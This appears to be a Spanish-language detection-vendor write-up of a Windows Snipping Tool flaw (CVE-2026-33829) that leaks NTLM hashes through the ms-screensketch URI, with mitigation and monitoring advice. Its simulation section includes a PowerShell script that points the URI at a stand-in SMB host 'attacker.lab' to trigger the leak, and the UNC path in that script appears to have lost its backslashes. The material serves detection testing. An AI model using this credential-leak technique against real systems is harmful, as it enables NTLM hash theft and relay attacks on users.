CVE-2026-33829: Fuga de NTLM en Snipping Tool
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Una vulnerabilidad en la herramienta de recortes de Windows puede exponer hashes Net-NTLM del usuario actualmente conectado a un atacante remoto. El problema se desencadena a través de un enlace profundo malicioso que abusa del ms-screensketch esquema URI, causando que la herramienta de recortes abra un archivo alojado en un recurso compartido SMB controlado por el atacante. Aunque la víctima debe hacer clic o abrir el enlace diseñado, la filtración de credenciales en sí ocurre silenciosamente en segundo plano cuando Windows inicia la conexión SMB. Este comportamiento puede dar a los atacantes acceso a datos de desafío-respuesta NTLM sin ninguna advertencia visible para el usuario.
Investigación
Los investigadores encontraron que el ms-screensketch protocolo acepta un filePath parámetro y no restringe adecuadamente rutas UNC arbitrarias. Cuando la herramienta de recortes intenta acceder a dicha ruta, Windows intenta automáticamente autenticarse con el servidor SMB remoto, exponiendo la respuesta NTLM en el proceso. Para validar el problema, los investigadores construyeron scripts de prueba de concepto que lanzaron un monitor SMB y generaron un URI malicioso capaz de capturar el hash filtrado.
Mitigación
Microsoft lanzó una actualización de seguridad el 14 de abril de 2026 para abordar el problema eliminando el comportamiento de enlace profundo vulnerable de la herramienta de recortes. Aplicar este parche evita que la aplicación abra automáticamente rutas SMB proporcionadas por el atacante a través de URIs no confiables. Las organizaciones deben priorizar el despliegue de la actualización en sistemas Windows afectados para eliminar la exposición.
Respuesta
Los defensores deben monitorear intentos de invocar el ms-screensketch esquema URI y observar conexiones SMB salientes a hosts internos o externos inusuales. Los sistemas que no requieren la herramienta de recortes deben tener el protocolo restringido donde sea posible, y el despliegue del parche debe ser forzado sin demora. Cualquier hash NTLM expuesto debe ser investigado prontamente por signos de repetición, retransmisión u otro abuso posterior.
Flujo de Ataque
Ejecución de Simulación
Prerrequisito: La Verificación Previa de Telemetría y Línea de Base debe haber pasado.
Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTPs identificadas y apuntar a generar la telemetría exacta esperada por la lógica de detección.
-
Narrativa de Ataque y Comandos:
Un atacante ha obtenido un punto de apoyo en el puesto de trabajo de la víctima y desea recolectar hashes NTLM sin despertar sospechas. Aprovechando CVE-2026-33829, el atacante crea un
URI ms-screensketch:que apunta a un recurso compartido SMB controlado por el atacante (attacker.labsharepayload.png). Cuando la herramienta de recortes procesa este URI, Windows inicia automáticamente una conexión SMB al servidor remoto, filtrando la respuesta NTLM de la máquina. El atacante ejecuta el URI a través de PowerShell para asegurar que la herramienta de recortes se invoque en el contexto del usuario. -
Script de Prueba de Regresión:
# Filtración NTLM a través de la herramienta de recortes – script de activación # Ajuste la ruta UNC para apuntar a su monitor controlado. $attackerServer = "attacker.lab" $sharePath = "sharepayload.png" $uri = "ms-screensketch:edit?filePath=\$attackerServer$sharePath" Write-Host "Invocando la herramienta de recortes con URI malicioso..." Start-Process $uri # Espere unos segundos para que se complete el protocolo SMB Start-Sleep -Seconds 5 Write-Host "Invocación completa. Compruebe el SIEM para EventID 3 con DestinationHostname que contenga '$attackerServer'." -
Comandos de Limpieza:
# Eliminar cualquier proceso residual de la herramienta de recortes (si todavía está ejecutándose) Get-Process -Name "SnippingTool","SnippingTool.exe","ScreenSketch","ScreenSketch.exe" -ErrorAction SilentlyContinue | Stop-Process -Force # Opcional: eliminar archivos temporales creados en el lado del atacante (si hay alguno) # (Asume que tiene acceso de escritura al recurso compartido) # Remove-Item -Path "$attackerServer$sharePath" -Force